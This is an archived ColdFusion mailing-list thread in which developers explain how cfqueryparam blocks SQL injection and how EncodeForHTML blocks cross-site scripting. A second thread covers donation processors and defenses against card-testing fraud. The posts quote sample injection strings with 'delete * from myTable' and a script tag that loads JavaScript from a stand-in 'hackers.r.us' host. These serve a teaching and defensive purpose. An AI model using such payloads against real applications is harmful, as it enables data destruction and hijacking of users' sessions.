RE: cfqueryparam EncodeForHTML
I did - many times before I sent the message. So, explain, please. From CF: (cfqueryparam) Verifies the data type of a query parameter ... My example is a text field. The potential inject/bad data language is text. I just tested it and cfqueryparam did not prevent me from entering potentially bad data into the table. Larry V. Stephens -Original Message- From: .jonah [mailto:jonah@creori.com] Sent: Monday, November 03, 2014 9:46 PM To: cf-talk Subject: Re: cfqueryparam EncodeForHTML Read up on how query param works. It will protect against Johnson Johnson's;delete * ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:359557 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: cfqueryparam EncodeForHTML
cfqueryparam will not prevent the malicious data from getting entered into the table. However it does prevent the malicious text from executing as T-SQL. cfqueryparam does not parse or cleanse data in any way. Basically it passes the text as a variable to the sql statement. Thus preventing any malicious code in the text from executing. So instead of T-SQL actually executing like this: select * from myTable where x='some'; delete * from myTable --' cfqueryparam is actually running T-SQL something like this. select * from myType where x= @aVar CF and the database driver are assigning @aVar your text string, @aVar = some'; delete * from myTable -- . So the value of the string inside the variable can never be execute, as it is not part of the actual T-SQL syntax. Just a variable value at that point. You can specify a data type to the query param. So if you specified cf_sql_integer and attempted to insert text with that parameter you would get an T-SQL error data type mismatch of sorts. Hope this helps explain a bit. ~Byron ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:359558 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: cfqueryparam EncodeForHTML
Text input field Entry is Johnson Johnson's I store it in a table using cfqueryparam. All is good. Let's say the hacked entry is Johnson Johnson's;delete * (or something akin to that - you get the drift) I use cfqueryparam but it won't catch the hack; it's still just a string. Actually, it will prevent the value from being used to execute malicious SQL. To me, that's catching the hack. Converting the entire value to a string prevents the hack from working. At some point, before storing or after retrieval, I use EncodeForHTML to make that safe. Now I have either ... I'm not sure what you're trying to accomplish. If it's to remove the part of the value containing something that would be malicious SQL if it were executable, you have to determine what exactly is that part of the string, and how you differentiate it from other parts of the value that wouldn't be malicious SQL if they were executable. But at this point, this has nothing to do with safety unless your application sends the string as-is to another application which isn't parameterizing its SQL statements. Dave Watts, CTO, Fig Leaf Software 1-202-527-9569 http://www.figleaf.com/ http://training.figleaf.com/ Fig Leaf Software is a Service-Disabled Veteran-Owned Small Business (SDVOSB) on GSA Schedule, and provides the highest caliber vendor- authorized instruction at our training centers, online, or onsite. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:359559 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: cfqueryparam EncodeForHTML
Like querying malicious data and using it in another cfquery without cfqueryparam. As an extra safety feature, if your application does not use multiSQL statements at all, and depending on the type of database engine used, you could also streatly deactivate the multi statement facility. If you're using an Access database, you don't even have to deactivate it: there is NO multi statement facility. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:359560 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: cfqueryparam EncodeForHTML
what you really need is a Web Application Firewall which will clean all form and url params and strip out anything dodgy. There are plenty of generic web server WAF's, or if you want a CF specific solution then try FuseGuard. On Tue, Nov 4, 2014 at 5:26 PM, wrote: Like querying malicious data and using it in another cfquery without cfqueryparam. As an extra safety feature, if your application does not use multiSQL statements at all, and depending on the type of database engine used, you could also streatly deactivate the multi statement facility. If you're using an Access database, you don't even have to deactivate it: there is NO multi statement facility. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:359561 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: cfqueryparam EncodeForHTML
cfqueryparam and EncodeForHTML are used to prevent two different types of attack. cfqueryparam is for SQL injection attacks, as Byron explained. EncodeForHTML is used to prevent cross site scripting attacks (it does not prevent/escape sql injection), which exist when the attacker can execute arbitrary client side code (such as javascript). Suppose we specified companyName=Johnson Johnson'sscript src=//hackers.r.us/badstuff.js If you inserted that value into the db everyone who views that record in the DB may potentially execute the hackers javascript file which can do lots of things, potentially on behalf of the currently authenticated user. You don't necessarily need to run EncodeForHTML before inserting the data into the database, you just need to make sure that you call EncodeForHTML every time you output the variable. The reason for this is that you can end up double encoding when you edit the record, or maybe you want to output the value in another context such as a HTML attribute, then you want to use EncodeForHTMLAttribute on the raw value instead. In some apps though it can be a much easier solution to just encode it before inserting the data if it is output in a million places. -- Pete Freitag - Adobe Community Professional http://foundeo.com/ - ColdFusion Consulting Products http://hackmycf.com - Is your ColdFusion Server Secure? http://www.youtube.com/watch?v=ubESB87vl5U - FuseGuard your CFML in 10 minutes On Mon, Nov 3, 2014 at 3:41 PM, Stephens, Larry V steph...@iu.edu wrote: Text input field Entry is Johnson Johnson's I store it in a table using cfqueryparam. All is good. Let's say the hacked entry is Johnson Johnson's;delete * (or something akin to that - you get the drift) I use cfqueryparam but it won't catch the hack; it's still just a string. At some point, before storing or after retrieval, I use EncodeForHTML to make that safe. Now I have either Johnson amp; Johnson#x27;s or Johnson amp; Johnson#x27;s#x3b;delete #x2a; Supposedly, that's safe. Regex could strip out the delete or kill the thing when I tried to save the data in the first place, but I tried several examples and none seemed to work. The thing is, Johnson amp; Johnson#x27;s may display correctly on the screen but it's not good for a search function, particularly if I have a legacy database. To parody a commercial for a different product, what are you using for protection? Larry V. Stephen ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:359562 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Non-profit donation providers
Hi Al Thanks for this. I will pass the info on to the group I am working with. Rob On 2 Nov 2014 at 11:16, Al Musella, DPM wrote: I use paypal.. Couldn't be easier, and they give a discount on the rates to nonprofits... however, there is one big problem... Bad people have been using my donation form to test stolen credit cards. They use the stolen credit cards to make a small donation to see if the cards work. I have the security set so they need address verification as well as the security code and still many get through. When someone complains of fraud, paypal removes the donation and a big fee (aorund $25.. I forget the exact amount)... and threatens me that they will cut off my account if my fraud rate doesn't go down.. I called them and they offer no help at all. So what I do now is have my server send an email to my phone when a donation is made. If it looks suspicious, I click a link in the email that will ban that IP address from making a successful donation (anything they try gets them a page that says the donation failed. ) Then I go back and reverse any donations that got through with that IP address or amount around that time. Most of the time they are all the same amount.. We have a $5 minimum, so they are mostly $5. Before I had a minimum, they were usually $1. I also allow only 3 attempts per IP address per day.. even if successful - it will alert me and I check to verify the donations they made were good. Hi Folks Any recommendations for church/non-profit online donations, especially recurring donations? Thanks Rob Robert J. Voyle, Psy.D. Director, Clergy Leadership Institute For Coaching and Training in Appreciative Inquiry Author: Restoring Hope: Appreciative Strategies to Resolve Grief and Resentment http://www.appreciativeway.com/ 503-647-2378 or 503-647-2382 ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag= houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:35 9553 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:359563 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
